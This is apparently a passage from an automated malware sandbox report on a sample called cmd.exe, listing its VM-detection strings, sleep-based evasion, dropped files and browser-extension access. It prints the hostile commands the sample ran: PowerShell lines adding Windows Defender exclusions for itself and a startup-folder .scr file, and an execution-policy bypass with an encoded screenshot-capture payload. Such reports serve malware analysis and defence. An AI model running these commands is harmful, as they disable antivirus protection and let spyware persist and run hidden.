              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3705Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2946Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2984Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 675
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1857
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2639
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1260
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4345
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_ctypes.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.dllJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\python310.dllJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72642\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17250
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 3705 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 2946 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 2984 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 8096Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 675 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8332Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8384Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8372Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep count: 2639 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep count: 1260 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3624Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824Thread sleep count: 4345 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8820Thread sleep count: 206 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEF83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF70AEF83B0
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEF92F0 FindFirstFileExW,FindClose,0_2_00007FF70AEF92F0
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF118E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF70AF118E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4046EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,65_2_00007FF69A4046EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3FE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,65_2_00007FF69A3FE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4488E0 FindFirstFileExA,65_2_00007FF69A4488E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtrayZ
              Source: getmac.exe, 00000031.00000002.1843041975.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF11C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer4
              Source: WMIC.exe, 0000001F.00000003.1806334380.000001E251AEA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001F.00000003.1806502468.000001E251AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qeMU)
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 00000031.00000003.1840629752.000001E8EF11C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: svchost.exe, 0000001C.00000002.2946017704.00000240CA658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2945962404.00000240CA641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2944570569.00000240C502B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.1843041975.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxserviceZ
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer4Z
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: cmd.exe, 00000001.00000003.2091061273.000001C916C6C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1934604967.000001C9172EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1934604967.000001C917269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: cmd.exe, 00000001.00000003.1716177022.000001C916988000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2097860677.000001C916930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvcZ
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuserZ
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: getmac.exe, 00000031.00000002.1843041975.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWRoot%\system32\dy
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-gaZ
              Source: getmac.exe, 00000031.00000003.1840990615.000001E8EF14F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.1843041975.000001E8EF152000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExportD
              Source: getmac.exe, 00000031.00000003.1840990615.000001E8EF14F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.1843041975.000001E8EF152000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.1840629752.000001E8EF13C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvcZ
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretrayZ
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEFD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70AEFD19C
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF134F0 GetProcessHeap,0_2_00007FF70AF134F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEFD37C SetUnhandledExceptionFilter,0_2_00007FF70AEFD37C
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEFD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70AEFD19C
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEFC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF70AEFC910
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF0A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70AF0A684
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A444C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_00007FF69A444C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_00007FF69A43B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,65_2_00007FF69A43A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43B6D8 SetUnhandledExceptionFilter,65_2_00007FF69A43B6D8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGU